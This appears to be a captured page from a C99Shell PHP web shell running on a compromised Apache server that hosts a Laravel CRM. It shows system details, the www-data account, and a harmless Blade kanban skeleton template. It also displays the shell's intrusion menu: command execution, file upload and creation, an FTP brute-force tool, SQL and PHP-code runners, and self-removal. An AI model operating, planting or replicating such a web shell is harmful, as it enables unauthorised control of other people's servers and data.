!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/packages/Webkul/Admin/src/Resources/views/components/shimmer/pipelines/   drwxrwxrwx
Free 12.95 GB of 57.97 GB (22.34%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     kanban.blade.php (1.44 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="flex gap-4 overflow-auto max-xl:flex-wrap">
    @for ($i = 1; $i <= 6; $i++)
        <div class="flex h-[380px] min-w-[275px] max-w-[275px] flex-col justify-between rounded-lg border border-gray-200 bg-white dark:border-gray-800 dark:bg-gray-900">
            <!-- Stage Header -->
            <div class="flex flex-col gap-6 px-4 py-3">
                <!-- Stage Title and Action -->
                <div class="flex items-center justify-between">
                    <div class="shimmer h-4 w-20"></div>
                    <div class="shimmer h-[28px] w-[28px] rounded-md"></div>
                </div>
                
                <!-- Attribute Name -->
                <div class="flex flex-col gap-4">
                    <div class="flex flex-col gap-2">
                        <div class="shimmer h-5 w-20"></div>
                        <div class="shimmer h-[38px] w-full rounded"></div>
                    </div>
                    
                    <div class="flex flex-col gap-2">
                        <div class="shimmer h-5 w-20"></div>
                        <div class="shimmer h-[38px] w-full rounded"></div>
                    </div>
                </div>
            </div>
            
            <div class="flex items-center gap-2 p-2">
                <div class="shimmer h-[26px] w-[26px] rounded-md"></div>

                <div class="shimmer h-5 w-20"></div>
            </div>
        </div>
    @endfor
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0061 ]--